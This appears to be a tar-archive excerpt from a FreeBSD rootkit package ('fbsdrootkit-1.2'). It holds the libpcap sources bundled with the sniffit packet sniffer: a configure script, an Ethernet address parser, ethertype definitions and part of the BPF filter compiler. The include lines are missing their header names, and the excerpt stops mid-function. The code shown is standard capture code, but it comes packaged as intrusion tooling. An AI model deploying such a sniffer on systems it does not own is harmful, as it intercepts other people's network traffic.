flex executable" else set s="version 
2.4 or higher required" echo "configure: ignoring obsolete flex executable ($s)" endif else echo "configure: couldn't find flex executable; using lex" endif if ( -x /usr/local/bin/bison || -x /usr/local/bison ) then set bison='-e s/^#have-bison#//' echo "configure: found bison executable" else echo "configure: couldn't find bison executable; using yacc" endif if ( ( "$flex" == "" && "$bison" != "" ) || \ ( "$flex" != "" && "$bison" == "" ) ) then set s="reverting to lex/yacc" echo "configure: don't have both flex and bison; $s" set flex set bison endif set libc foreach f ( /usr/lib/libc.a /lib/libc.a /usr/lib/libc_s.a ) if ( -f $f ) then set libc=$f break endif end if ( "$f" == "" ) then echo "configure: couldn't find libc" else nm $libc |& grep ether_ntoa > /dev/null if ( $status == 0 ) then set ethers='-e s/^#have-ethers#//' echo "configure: found support for /etc/ethers" endif endif if ( -x /usr/local/bin/gcc || -x /usr/local/gcc ) then set gcc='-e s/^#have-gcc#//' set ver=`gcc -v |& sed -n -e '$s/.* //' -e '$s/\..*//p'` if ( "$ver" == 1 ) set gcc1='-e s/^#have-gcc1#//' endif if ( -x /usr/bin/ranlib ) then set ranlib='-e s/^#have-ranlib#//' endif if ("$os" == "ultrix4" || "$os" == "sunos3") then set brokenmake='-e s/^#have-broken-make#//' endif rm -f stdlib.h Makefile if ( ! -f /usr/include/stdlib.h ) ln -s /dev/null stdlib.h sed -e "s/^#have-$pcap#//" -e "s/^#have-$os#//" \ $flex $bison $gcc $gcc1 $ranlib $ethers $brokenmake Makefile.in > Makefile set mflags="" if ( "$gcc" != "" ) then set mflags="CC=gcc" rm -f checkioctl make checkioctl ./checkioctl set xstatus=$status rm checkioctl if ( $xstatus != 0 ) then echo "configure: bailing..." 
rm Makefile exit 1 endif endif chmod ug+w Makefile make depend $mflags exit 0 fbsdrootkit-1.2/sniffit.0.3.3/libpcap/configure.diff100600 764 764 526 6226213210 17437 0ustar dfdf*** ../libpcap-0.0.6~/configure Fri Apr 21 21:50:47 1995 --- configure Sat Sep 30 01:10:11 1995 *************** *** 22,25 **** --- 22,27 ---- else if ( -f /usr/include/sys/dlpi.h ) then set pcap=dlpi + else if ( -f /usr/include/linux/types.h ) then + set pcap=linux else echo "configure: cannot determine packet capture interface" fbsdrootkit-1.2/sniffit.0.3.3/libpcap/etherent.c100400 764 764 6333 6226213210 16626 0ustar dfdf/* * Copyright (c) 1990, 1993, 1994 * The Regents of the University of California. All rights reserved. * * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that: (1) source code distributions * retain the above copyright notice and this paragraph in its entirety, (2) * distributions including binary code include the above copyright notice and * this paragraph in its entirety in the documentation or other materials * provided with the distribution, and (3) all advertising materials mentioning * features or use of this software display the following acknowledgement: * ``This product includes software developed by the University of California, * Lawrence Berkeley Laboratory and its contributors.'' Neither the name of * the University nor the names of its contributors may be used to endorse * or promote products derived from this software without specific prior * written permission. * THIS SOFTWARE IS PROVIDED ``AS IS'' AND WITHOUT ANY EXPRESS OR IMPLIED * WARRANTIES, INCLUDING, WITHOUT LIMITATION, THE IMPLIED WARRANTIES OF * MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. 
 */
#ifndef lint
static char rcsid[] =
    "@(#) $Header: etherent.c,v 1.8 94/06/20 19:07:50 leres Exp $ (LBL)";
#endif

/* NOTE(review): the header names on the #include line below are missing from this copy of the file. */
#include #include #include #include #include

#ifndef __GNUC__
#define inline
#endif

static inline int xdtoi(int);
static inline int skip_space(FILE *);
static inline int skip_line(FILE *);

/*
 * Hex digit to integer.  The caller is expected to pass a hex digit;
 * any other character falls through to the upper-case arithmetic.
 */
static inline int
xdtoi(c)
	register int c;
{
	if (isdigit(c))
		return c - '0';
	return c - (islower(c) ? 'a' : 'A') + 10;
}

/*
 * Consume white space other than newline and return the first character
 * that is either a newline or not white space (possibly EOF).
 */
static inline int
skip_space(f)
	FILE *f;
{
	int ch;

	for (;;) {
		ch = getc(f);
		if (!isspace(ch) || ch == '\n')
			return ch;
	}
}

/*
 * Consume the rest of the current line.  Returns the newline that ended
 * it, or EOF if the stream ran out first.
 */
static inline int
skip_line(f)
	FILE *f;
{
	int ch;

	while ((ch = getc(f)) != '\n' && ch != EOF)
		continue;
	return ch;
}

/*
 * Read the next (address, name) pair from 'fp'.
 *
 * Returns a pointer to a static entry that the next call overwrites, or
 * 0 at end of file.  'nline' is static as well: it records whether the
 * previous call stopped at the end of a line, so a call that stopped
 * mid-line resumes on that line and reuses the address already stored.
 */
struct pcap_etherent *
pcap_next_etherent(FILE *fp)
{
	register int c, d, i;
	char *bp;
	static struct pcap_etherent e;
	static int nline = 1;

	for (;;) {
		while (nline) {
			/* Find addr */
			c = skip_space(fp);
			if (c == '\n')
				continue;

			if (isxdigit(c)) {
				/* must be the start of an address */
				for (i = 0; i < 6; i += 1) {
					d = xdtoi(c);
					c = getc(fp);
					if (c != ':') {
						/* second hex digit of the byte */
						d <<= 4;
						d |= xdtoi(c);
						c = getc(fp);
					}
					e.addr[i] = d;
					if (c != ':')
						break;
					c = getc(fp);
				}
				nline = 0;
			} else {
				/*
				 * A comment, or the first thing on the line
				 * cannot be an ethernet address: skip it.
				 */
				c = skip_line(fp);
			}

			if (c == EOF)
				return 0;
		}

		/*
		 * If we started a new line, 'c' holds the char past the
		 * ether addr, which we assume is white space.  If we are
		 * continuing a line, 'c' is garbage.  In either case, we
		 * can throw it away.
		 */
		c = skip_space(fp);
		if (c == EOF)
			return 0;
		if (c == '\n') {
			nline = 1;
			continue;
		}
		if (c == '#') {
			(void)skip_line(fp);
			nline = 1;
			continue;
		}
		break;
	}

	/* Must be a name. */
	bp = e.name;
	/*
	 * 'd' counts the bytes that may still be stored, leaving room for
	 * the terminator; this is what keeps a long name inside e.name.
	 */
	d = sizeof(e.name) - 1;
	for (;;) {
		*bp++ = c;
		c = getc(fp);
		if (isspace(c) || c == EOF)
			break;
		if (--d <= 0)
			break;
	}
	*bp = '\0';

	if (c == '\n')
		nline = 1;
	return &e;
}
fbsdrootkit-1.2/sniffit.0.3.3/libpcap/ethertype.h100400 764 764 4364 6226213210 17030 0ustar dfdf/*
 * Copyright (c) 1993, 1994
 * The Regents of the University of California. All rights reserved.
 *
 * Redistribution and use in source and binary forms, with or without
 * modification, are permitted provided that: (1) source code distributions
 * retain the above copyright notice and this paragraph in its entirety, (2)
 * distributions including binary code include the above copyright notice and
 * this paragraph in its entirety in the documentation or other materials
 * provided with the distribution, and (3) all advertising materials mentioning
 * features or use of this software display the following acknowledgement:
 * ``This product includes software developed by the University of California,
 * Lawrence Berkeley Laboratory and its contributors.'' Neither the name of
 * the University nor the names of its contributors may be used to endorse
 * or promote products derived from this software without specific prior
 * written permission.
 * THIS SOFTWARE IS PROVIDED ``AS IS'' AND WITHOUT ANY EXPRESS OR IMPLIED
 * WARRANTIES, INCLUDING, WITHOUT LIMITATION, THE IMPLIED WARRANTIES OF
 * MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE.
* * @(#) $Header: ethertype.h,v 1.2 94/06/14 20:03:27 leres Exp $ (LBL) */ /* Map between Ethernet protocol types and names */ /* Add other Ethernet packet types here */ #ifndef ETHERTYPE_SPRITE #define ETHERTYPE_SPRITE 0x0500 #endif #ifndef ETHERTYPE_MOPDL #define ETHERTYPE_MOPDL 0x6001 #endif #ifndef ETHERTYPE_MOPRC #define ETHERTYPE_MOPRC 0x6002 #endif #ifndef ETHERTYPE_DN #define ETHERTYPE_DN 0x6003 #endif #ifndef ETHERTYPE_LAT #define ETHERTYPE_LAT 0x6004 #endif #ifndef ETHERTYPE_LANBRIDGE #define ETHERTYPE_LANBRIDGE 0x8038 #endif #ifndef ETHERTYPE_DECDNS #define ETHERTYPE_DECDNS 0x803c #endif #ifndef ETHERTYPE_DECDTS #define ETHERTYPE_DECDTS 0x803e #endif #ifndef ETHERTYPE_VEXP #define ETHERTYPE_VEXP 0x805b #endif #ifndef ETHERTYPE_VPROD #define ETHERTYPE_VPROD 0x805c #endif #ifndef ETHERTYPE_LOOPBACK #define ETHERTYPE_LOOPBACK 0x9000 #endif #ifndef ETHERTYPE_ATALK #define ETHERTYPE_ATALK 0x809b /* XXX */ #endif #ifndef ETHERTYPE_AARP #define ETHERTYPE_AARP 0x80f3 #endif #ifndef ETHERTYPE_NS #define ETHERTYPE_NS 0x0600 #endif #ifndef ETHERTYPE_REVARP #define ETHERTYPE_REVARP 0x8035 #endif fbsdrootkit-1.2/sniffit.0.3.3/libpcap/gencode.c100400 764 764 101175 6226213210 16454 0ustar dfdf/* * Copyright (c) 1990, 1991, 1992, 1993, 1994 * The Regents of the University of California. All rights reserved. 
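 *
 * Redistribution and use in source and binary forms, with or without
 * modification, are permitted provided that: (1) source code distributions
 * retain the above copyright notice and this paragraph in its entirety, (2)
 * distributions including binary code include the above copyright notice and
 * this paragraph in its entirety in the documentation or other materials
 * provided with the distribution, and (3) all advertising materials mentioning
 * features or use of this software display the following acknowledgement:
 * ``This product includes software developed by the University of California,
 * Lawrence Berkeley Laboratory and its contributors.'' Neither the name of
 * the University nor the names of its contributors may be used to endorse
 * or promote products derived from this software without specific prior
 * written permission.
 * THIS SOFTWARE IS PROVIDED ``AS IS'' AND WITHOUT ANY EXPRESS OR IMPLIED
 * WARRANTIES, INCLUDING, WITHOUT LIMITATION, THE IMPLIED WARRANTIES OF
 * MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE.
 */
#ifndef lint
static char rcsid[] =
    "@(#) $Header: gencode.c,v 1.55 94/06/20 19:07:53 leres Exp $ (LBL)";
#endif

/* NOTE(review): the header names on the #include lines below are missing from this copy of the file. */
#include #include #include #include #include #include #include #include #include #include #include
#if __STDC__
#include #include
#else
#include
#endif
#include "gencode.h"

#ifndef __GNUC__
#define inline
#endif

#ifndef ETHERTYPE_REVARP
#define ETHERTYPE_REVARP 0x8035
#endif
#ifndef ETHERTYPE_MOPDL
#define ETHERTYPE_MOPDL 0x6001
#endif
#ifndef ETHERTYPE_MOPRC
#define ETHERTYPE_MOPRC 0x6002
#endif
#ifndef ETHERTYPE_DN
#define ETHERTYPE_DN 0x6003
#endif
#ifndef ETHERTYPE_LAT
#define ETHERTYPE_LAT 0x6004
#endif

#define JMP(c) ((c)|BPF_JMP|BPF_K)

static jmp_buf top_ctx;		/* where bpf_error() unwinds to */
static pcap_t *bpf_pcap;	/* handle whose error buffer gets the message */

/*
 * Record a formatted error message for the current compilation and unwind
 * to the setjmp() point in pcap_compile().  Does not return.
 *
 * Several callers in this file pass text taken from the filter expression
 * through "%s" (for example "unknown host '%s'"), so the formatted length
 * is not under this file's control.  The write is therefore bounded by the
 * size of the destination.  PCAP_ERRBUF_SIZE is the error-buffer size
 * constant from pcap.h -- TODO confirm that this tree's pcap.h defines it
 * and that pcap_geterr() returns a buffer of at least that size.
 */
/* VARARGS */
volatile void
#if __STDC__ || defined(SOLARIS)
bpf_error(char *fmt, ...)
#else
bpf_error(fmt, va_alist)
	char *fmt;
	va_dcl
#endif
{
	va_list ap;

#if __STDC__
	va_start(ap, fmt);
#else
	va_start(ap);
#endif
	if (bpf_pcap != NULL)
		(void)vsnprintf(pcap_geterr(bpf_pcap), PCAP_ERRBUF_SIZE,
		    fmt, ap);
	va_end(ap);
	longjmp(top_ctx, 1);
	/* NOTREACHED */
}

static void init_linktype(int);

static int alloc_reg(void);
static void free_reg(int);

static struct block *root;

/*
 * We divvy out chunks of memory rather than call malloc each time so
 * we don't have to worry about leaking memory.  It's probably
 * not a big deal if all this memory was wasted but if this ever
 * goes into a library that would probably not be a good idea.
 */
#define NCHUNKS 16
#define CHUNK0SIZE 1024
struct chunk {
	u_int n_left;	/* bytes of 'm' not yet handed out */
	void *m;	/* start of the chunk's storage */
};

static struct chunk chunks[NCHUNKS];
static int cur_chunk;

static void *newchunk(u_int);
static void freechunks(void);
static inline struct block *new_block(int);
static inline struct slist *new_stmt(int);
static struct block *gen_retblk(int);
static inline void syntax(void);

static void backpatch(struct block *, struct block *);
static void merge(struct block *, struct block *);
static struct block *gen_cmp(u_int, u_int, long);
static struct block *gen_mcmp(u_int, u_int, long, u_long);
static struct block *gen_bcmp(u_int, u_int, u_char *);
static struct block *gen_uncond(int);
static inline struct block *gen_true(void);
static inline struct block *gen_false(void);
static struct block *gen_linktype(int);
static struct block *gen_hostop(u_long, u_long, int, int, u_int, u_int);
static struct block *gen_ehostop(u_char *, int);
#ifdef FDDI
static struct block *gen_fhostop(u_char *, int);
#endif
static struct block *gen_dnhostop(u_long, int, u_int);
static struct block *gen_host(u_long, u_long, int, int);
static struct block *gen_gateway(u_char *, u_long **, int, int);
static struct block *gen_ipfrag(void);
static struct block *gen_portatom(int, long);
struct block *gen_portop(int, int, int);
static struct block *gen_port(int, int, int);
static int lookup_proto(char *,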
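 int);
static struct block *gen_proto(int, int, int);
static u_long net_mask(u_long *);
static u_long net_mask(u_long *);
static struct slist *xfer_to_x(struct arth *);
static struct slist *xfer_to_a(struct arth *);
static struct block *gen_len(int, int);

/*
 * Hand out 'n' bytes (rounded up to a multiple of sizeof(long)) of zeroed
 * memory from the current chunk, starting a new, larger chunk when the
 * current one cannot satisfy the request.  Failure is reported through
 * bpf_error(), which does not return.
 *
 * The allocator state is file-scope and outlives a single compilation, so
 * it is only advanced once the new chunk really exists: an index that ran
 * past the table, or a chunk slot with a NULL pointer and a non-zero
 * 'n_left', would otherwise be picked up by the next call.
 */
static void *
newchunk(n)
	u_int n;
{
	struct chunk *cp;
	void *mem;
	int k, size;

	/* XXX Round up to nearest long. */
	n = (n + sizeof(long) - 1) & ~(sizeof(long) - 1);

	cp = &chunks[cur_chunk];
	if (n > cp->n_left) {
		k = cur_chunk + 1;
		if (k >= NCHUNKS)
			bpf_error("out of memory");
		size = CHUNK0SIZE << k;
		mem = (void *)malloc(size);
		/* malloc() can fail; do not memset() through NULL. */
		if (mem == NULL)
			bpf_error("out of memory");
		memset((char *)mem, 0, size);

		cur_chunk = k;
		cp = &chunks[k];
		cp->m = mem;
		cp->n_left = size;
		if (n > size)
			bpf_error("out of memory");
	}
	/* Allocations are carved from the top of the chunk downwards. */
	cp->n_left -= n;
	return (void *)((char *)cp->m + cp->n_left);
}

/*
 * Release every chunk and return the allocator to its initial state.
 *
 * Clearing the pointers, the byte counts and the current index matters:
 * pcap_compile() calls this at the end of each successful compilation,
 * and without the reset the next newchunk() would hand out memory from a
 * chunk that has already been passed to free().
 */
static void
freechunks()
{
	int i;

	for (i = 0; i < NCHUNKS; ++i) {
		if (chunks[i].m != NULL)
			free(chunks[i].m);
		chunks[i].m = NULL;
		chunks[i].n_left = 0;
	}
	cur_chunk = 0;
}

/*
 * A strdup whose allocations are freed after code generation is over.
 * The copy is sized from strlen(s) + 1, so strcpy() cannot overrun it.
 */
char *
sdup(s)
	char *s;
{
	int n = strlen(s) + 1;
	char *cp = newchunk(n);

	strcpy(cp, s);
	return (cp);
}

/*
 * Allocate a zeroed block for instruction 'code'.  A new block is the
 * head of its own list.
 */
static inline struct block *
new_block(code)
	int code;
{
	struct block *p;

	p = (struct block *)newchunk(sizeof(*p));
	p->s.code = code;
	p->head = p;

	return p;
}

/* Allocate a zeroed statement-list node for instruction 'code'. */
static inline struct slist *
new_stmt(code)
	int code;
{
	struct slist *p;

	p = (struct slist *)newchunk(sizeof(*p));
	p->s.code = code;

	return p;
}

/* Build a block that returns the constant 'v'. */
static struct block *
gen_retblk(v)
	int v;
{
	struct block *b = new_block(BPF_RET|BPF_K);

	b->s.k = v;
	return b;
}

/* Report a generic parse failure; does not return. */
static inline void
syntax()
{
	bpf_error("syntax error in filter expression");
}

static u_long netmask;
static int snaplen;

int
pcap_compile(pcap_t *p, struct bpf_program *program,
	     char *buf, int optimize, u_long mask)
{
	extern int n_errors;
	int len;

	bpf_pcap = p;
	if (setjmp(top_ctx))
		return (-1);

	netmask = mask;
	snaplen = pcap_snapshot(p);

	lex_init(buf ?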
buf : ""); init_linktype(pcap_datalink(p)); pcap_parse(); if (n_errors) syntax(); if (root == NULL) root = gen_retblk(snaplen); if (optimize) { bpf_optimize(&root); if (root == NULL || (root->s.code == (BPF_RET|BPF_K) && root->s.k == 0)) bpf_error("expression rejects all packets"); } program->bf_insns = icode_to_fcode(root, &len); program->bf_len = len; freechunks(); return (0); } /* * Backpatch the blocks in 'list' to 'target'. The 'sense' field indicates * which of the jt and jf fields has been resolved and which is a pointer * back to another unresolved block (or nil). At least one of the fields * in each block is already resolved. */ static void backpatch(list, target) struct block *list, *target; { struct block *next; while (list) { if (!list->sense) { next = JT(list); JT(list) = target; } else { next = JF(list); JF(list) = target; } list = next; } } /* * Merge the lists in b0 and b1, using the 'sense' field to indicate * which of jt and jf is the link. */ static void merge(b0, b1) struct block *b0, *b1; { register struct block **p = &b0; /* Find end of list. */ while (*p) p = !((*p)->sense) ? &JT(*p) : &JF(*p); /* Concatenate the lists. 
*/ *p = b1; } void finish_parse(p) struct block *p; { backpatch(p, gen_retblk(snaplen)); p->sense = !p->sense; backpatch(p, gen_retblk(0)); root = p->head; } void gen_and(b0, b1) struct block *b0, *b1; { backpatch(b0, b1->head); b0->sense = !b0->sense; b1->sense = !b1->sense; merge(b1, b0); b1->sense = !b1->sense; b1->head = b0->head; } void gen_or(b0, b1) struct block *b0, *b1; { b0->sense = !b0->sense; backpatch(b0, b1->head); b0->sense = !b0->sense; merge(b1, b0); b1->head = b0->head; } void gen_not(b) struct block *b; { b->sense = !b->sense; } static struct block * gen_cmp(offset, size, v) u_int offset, size; long v; { struct slist *s; struct block *b; s = new_stmt(BPF_LD|BPF_ABS|size); s->s.k = offset; b = new_block(JMP(BPF_JEQ)); b->stmts = s; b->s.k = v; return b; } static struct block * gen_mcmp(offset, size, v, mask) u_int offset, size; long v; u_long mask; { struct block *b = gen_cmp(offset, size, v); struct slist *s; if (mask != 0xffffffff) { s = new_stmt(BPF_ALU|BPF_AND|BPF_K); s->s.k = mask; b->stmts->next = s; } return b; } static struct block * gen_bcmp(offset, size, v) u_int offset, size; u_char *v; { struct block *b, *tmp; b = NULL; while (size >= 4) { u_char *p = &v[size - 4]; long w = (p[0] << 24) | (p[1] << 16) | (p[2] << 8) | p[3]; tmp = gen_cmp(offset + size - 4, BPF_W, w); if (b != NULL) gen_and(b, tmp); b = tmp; size -= 4; } while (size >= 2) { u_char *p = &v[size - 2]; long w = (p[0] << 8) | p[1]; tmp = gen_cmp(offset + size - 2, BPF_H, w); if (b != NULL) gen_and(b, tmp); b = tmp; size -= 2; } if (size > 0) { tmp = gen_cmp(offset, BPF_B, (long)v[0]); if (b != NULL) gen_and(b, tmp); b = tmp; } return b; } /* * Various code constructs need to know the layout of the data link * layer. These variables give the necessary offsets. off_linktype * is set to -1 for no encapsulation, in which case, IP is assumed. 
*/ static u_int off_linktype; static u_int off_nl; static int linktype; #ifdef FDDI extern int fddipad; #endif static void init_linktype(type) int type; { linktype = type; switch (type) { case DLT_EN10MB: off_linktype = 12; off_nl = 14; return; case DLT_SLIP: /* * SLIP doesn't have a link level type. The 16 byte * header is hacked into our SLIP driver. */ off_linktype = -1; off_nl = 16; return; case DLT_NULL: off_linktype = -1; off_nl = 0; return; case DLT_PPP: off_linktype = 2; off_nl = 4; return; #ifdef FDDI case DLT_FDDI: /* * FDDI doesn't really have a link-level type field. * We assume that SSAP = SNAP is being used and pick * out the encapsulated Ethernet type. */ off_linktype = 19 + fddipad; off_nl = 21 + fddipad; return; #endif case DLT_IEEE802: off_linktype = 20; off_nl = 22; return; } bpf_error("unknown data link type 0x%x", linktype); /* NOTREACHED */ } static struct block * gen_uncond(rsense) int rsense; { struct block *b; struct slist *s; s = new_stmt(BPF_LD|BPF_IMM); s->s.k = !rsense; b = new_block(JMP(BPF_JEQ)); b->stmts = s; return b; } static inline struct block * gen_true() { return gen_uncond(1); } static inline struct block * gen_false() { return gen_uncond(0); } static struct block * gen_linktype(proto) int proto; { switch (linktype) { case DLT_SLIP: if (proto == ETHERTYPE_IP) return gen_true(); else return gen_false(); case DLT_PPP: if (proto == ETHERTYPE_IP) proto = 0x0021; /* XXX - need ppp.h defs */ break; } return gen_cmp(off_linktype, BPF_H, (long)proto); } static struct block * gen_hostop(addr, mask, dir, proto, src_off, dst_off) u_long addr; u_long mask; int dir, proto; u_int src_off, dst_off; { struct block *b0, *b1; u_int offset; switch (dir) { case Q_SRC: offset = src_off; break; case Q_DST: offset = dst_off; break; case Q_AND: b0 = gen_hostop(addr, mask, Q_SRC, proto, src_off, dst_off); b1 = gen_hostop(addr, mask, Q_DST, proto, src_off, dst_off); gen_and(b0, b1); return b1; case Q_OR: case Q_DEFAULT: b0 = gen_hostop(addr, mask, 
Q_SRC, proto, src_off, dst_off); b1 = gen_hostop(addr, mask, Q_DST, proto, src_off, dst_off); gen_or(b0, b1); return b1; default: abort(); } b0 = gen_linktype(proto); b1 = gen_mcmp(offset, BPF_W, (long)addr, mask); gen_and(b0, b1); return b1; } static struct block * gen_ehostop(eaddr, dir) u_char *eaddr; int dir; { struct block *b0, *b1; switch (dir) { case Q_SRC: return gen_bcmp(6, 6, eaddr); case Q_DST: return gen_bcmp(0, 6, eaddr); case Q_AND: b0 = gen_ehostop(eaddr, Q_SRC); b1 = gen_ehostop(eaddr, Q_DST); gen_and(b0, b1); return b1; case Q_DEFAULT: case Q_OR: b0 = gen_ehostop(eaddr, Q_SRC); b1 = gen_ehostop(eaddr, Q_DST); gen_or(b0, b1); return b1; } abort(); /* NOTREACHED */ } #ifdef FDDI /* * Like gen_ehostop, but for DLT_FDDI */ static struct block * gen_fhostop(eaddr, dir) u_char *eaddr; int dir; { struct block *b0, *b1; switch (dir) { case Q_SRC: return gen_bcmp(6 + 1 + fddipad, 6, eaddr); case Q_DST: return gen_bcmp(0 + 1 + fddipad, 6, eaddr); case Q_AND: b0 = gen_fhostop(eaddr, Q_SRC); b1 = gen_fhostop(eaddr, Q_DST); gen_and(b0, b1); return b1; case Q_DEFAULT: case Q_OR: b0 = gen_fhostop(eaddr, Q_SRC); b1 = gen_fhostop(eaddr, Q_DST); gen_or(b0, b1); return b1; } abort(); /* NOTREACHED */ } #endif /* * This is quite tricky because there may be pad bytes in front of the * DECNET header, and then there are two possible data packet formats that * carry both src and dst addresses, plus 5 packet types in a format that * carries only the src node, plus 2 types that use a different format and * also carry just the src node. * * Yuck. * * Instead of doing those all right, we just look for data packets with * 0 or 1 bytes of padding. If you want to look at other packets, that * will require a lot more hacking. * * To add support for filtering on DECNET "areas" (network numbers) * one would want to add a "mask" argument to this routine. 
That would * make the filter even more inefficient, although one could be clever * and not generate masking instructions if the mask is 0xFFFF. */ static struct block * gen_dnhostop(addr, dir, base_off) u_long addr; int dir; u_int base_off; { struct block *b0, *b1, *b2, *tmp; u_int offset_lh; /* offset if long header is received */ u_int offset_sh; /* offset if short header is received */ switch (dir) { case Q_DST: offset_sh = 1; /* follows flags */ offset_lh = 7; /* flgs,darea,dsubarea,HIORD */ break; case Q_SRC: offset_sh = 3; /* follows flags, dstnode */ offset_lh = 15; /* flgs,darea,dsubarea,did,sarea,ssub,HIORD */ break; case Q_AND: /* Inefficient because we do our Calvinball dance twice */ b0 = gen_dnhostop(addr, Q_SRC, base_off); b1 = gen_dnhostop(addr, Q_DST, base_off); gen_and(b0, b1); return b1; case Q_OR: case Q_DEFAULT: /* Inefficient because we do our Calvinball dance twice */ b0 = gen_dnhostop(addr, Q_SRC, base_off); b1 = gen_dnhostop(addr, Q_DST, base_off); gen_or(b0, b1); return b1; default: abort(); } b0 = gen_linktype(ETHERTYPE_DN); /* Check for pad = 1, long header case */ tmp = gen_mcmp(base_off + 2, BPF_H, (long)ntohs(0x0681), (long)ntohs(0x07FF)); b1 = gen_cmp(base_off + 2 + 1 + offset_lh, BPF_H, (long)ntohs(addr)); gen_and(tmp, b1); /* Check for pad = 0, long header case */ tmp = gen_mcmp(base_off + 2, BPF_B, (long)0x06, (long)0x7); b2 = gen_cmp(base_off + 2 + offset_lh, BPF_H, (long)ntohs(addr)); gen_and(tmp, b2); gen_or(b2, b1); /* Check for pad = 1, short header case */ tmp = gen_mcmp(base_off + 2, BPF_H, (long)ntohs(0x0281), (long)ntohs(0x07FF)); b2 = gen_cmp(base_off + 2 + 1 + offset_sh, BPF_H, (long)ntohs(addr)); gen_and(tmp, b2); gen_or(b2, b1); /* Check for pad = 0, short header case */ tmp = gen_mcmp(base_off + 2, BPF_B, (long)0x02, (long)0x7); b2 = gen_cmp(base_off + 2 + offset_sh, BPF_H, (long)ntohs(addr)); gen_and(tmp, b2); gen_or(b2, b1); /* Combine with test for linktype */ gen_and(b0, b1); return b1; } static struct block * 
gen_host(addr, mask, proto, dir) u_long addr; u_long mask; int proto; int dir; { struct block *b0, *b1; switch (proto) { case Q_DEFAULT: b0 = gen_host(addr, mask, Q_IP, dir); b1 = gen_host(addr, mask, Q_ARP, dir); gen_or(b0, b1); b0 = gen_host(addr, mask, Q_RARP, dir); gen_or(b1, b0); return b0; case Q_IP: return gen_hostop(addr, mask, dir, ETHERTYPE_IP, off_nl + 12, off_nl + 16); case Q_RARP: return gen_hostop(addr, mask, dir, ETHERTYPE_REVARP, off_nl + 14, off_nl + 24); case Q_ARP: return gen_hostop(addr, mask, dir, ETHERTYPE_ARP, off_nl + 14, off_nl + 24); case Q_TCP: bpf_error("'tcp' modifier applied to host"); case Q_UDP: bpf_error("'udp' modifier applied to host"); case Q_ICMP: bpf_error("'icmp' modifier applied to host"); case Q_DECNET: return gen_dnhostop(addr, dir, off_nl); case Q_LAT: bpf_error("LAT host filtering not implemented"); case Q_MOPDL: bpf_error("MOPDL host filtering not implemented"); case Q_MOPRC: bpf_error("MOPRC host filtering not implemented"); default: abort(); } /* NOTREACHED */ } static struct block * gen_gateway(eaddr, alist, proto, dir) u_char *eaddr; u_long **alist; int proto; int dir; { struct block *b0, *b1, *tmp; if (dir != 0) bpf_error("direction applied to 'gateway'"); switch (proto) { case Q_DEFAULT: case Q_IP: case Q_ARP: case Q_RARP: if (linktype == DLT_EN10MB) b0 = gen_ehostop(eaddr, Q_OR); #ifdef FDDI else if (linktype == DLT_FDDI) b0 = gen_fhostop(eaddr, Q_OR); #endif else bpf_error("'gateway' supported only on ethernet or FDDI"); b1 = gen_host(**alist++, 0xffffffffL, proto, Q_OR); while (*alist) { tmp = gen_host(**alist++, 0xffffffffL, proto, Q_OR); gen_or(b1, tmp); b1 = tmp; } gen_not(b1); gen_and(b0, b1); return b1; } bpf_error("illegal modifier of 'gateway'"); /* NOTREACHED */ } struct block * gen_proto_abbrev(proto) int proto; { struct block *b0, *b1; switch (proto) { case Q_TCP: b0 = gen_linktype(ETHERTYPE_IP); b1 = gen_cmp(off_nl + 9, BPF_B, (long)IPPROTO_TCP); gen_and(b0, b1); break; case Q_UDP: b0 = 
gen_linktype(ETHERTYPE_IP); b1 = gen_cmp(off_nl + 9, BPF_B, (long)IPPROTO_UDP); gen_and(b0, b1); break; case Q_ICMP: b0 = gen_linktype(ETHERTYPE_IP); b1 = gen_cmp(off_nl + 9, BPF_B, (long)IPPROTO_ICMP); gen_and(b0, b1); break; case Q_IP: b1 = gen_linktype(ETHERTYPE_IP); break; case Q_ARP: b1 = gen_linktype(ETHERTYPE_ARP); break; case Q_RARP: b1 = gen_linktype(ETHERTYPE_REVARP); break; case Q_LINK: bpf_error("link layer applied in wrong context"); case Q_DECNET: b1 = gen_linktype(ETHERTYPE_DN); break; case Q_LAT: b1 = gen_linktype(ETHERTYPE_LAT); break; case Q_MOPDL: b1 = gen_linktype(ETHERTYPE_MOPDL); break; case Q_MOPRC: b1 = gen_linktype(ETHERTYPE_MOPRC); break; default: abort(); } return b1; } static struct block * gen_ipfrag() { struct slist *s; struct block *b; /* not ip frag */ s = new_stmt(BPF_LD|BPF_H|BPF_ABS); s->s.k = off_nl + 6; b = new_block(JMP(BPF_JSET)); b->s.k = 0x1fff; b->stmts = s; gen_not(b); return b; } static struct block * gen_portatom(off, v) int off; long v; { struct slist *s; struct block *b; s = new_stmt(BPF_LDX|BPF_MSH|BPF_B); s->s.k = off_nl; s->next = new_stmt(BPF_LD|BPF_IND|BPF_H); s->next->s.k = off_nl + off; b = new_block(JMP(BPF_JEQ)); b->stmts = s; b->s.k = v; return b; } struct block * gen_portop(port, proto, dir) int port, proto, dir; { struct block *b0, *b1, *tmp; /* ip proto 'proto' */ tmp = gen_cmp(off_nl + 9, BPF_B, (long)proto); b0 = gen_ipfrag(); gen_and(tmp, b0); switch (dir) { case Q_SRC: b1 = gen_portatom(0, (long)port); break; case Q_DST: b1 = gen_portatom(2, (long)port); break; case Q_OR: case Q_DEFAULT: tmp = gen_portatom(0, (long)port); b1 = gen_portatom(2, (long)port); gen_or(tmp, b1); break; case Q_AND: tmp = gen_portatom(0, (long)port); b1 = gen_portatom(2, (long)port); gen_and(tmp, b1); break; default: abort(); } gen_and(b0, b1); return b1; } static struct block * gen_port(port, ip_proto, dir) int port; int ip_proto; int dir; { struct block *b0, *b1, *tmp; /* ether proto ip */ b0 = gen_linktype(ETHERTYPE_IP); 
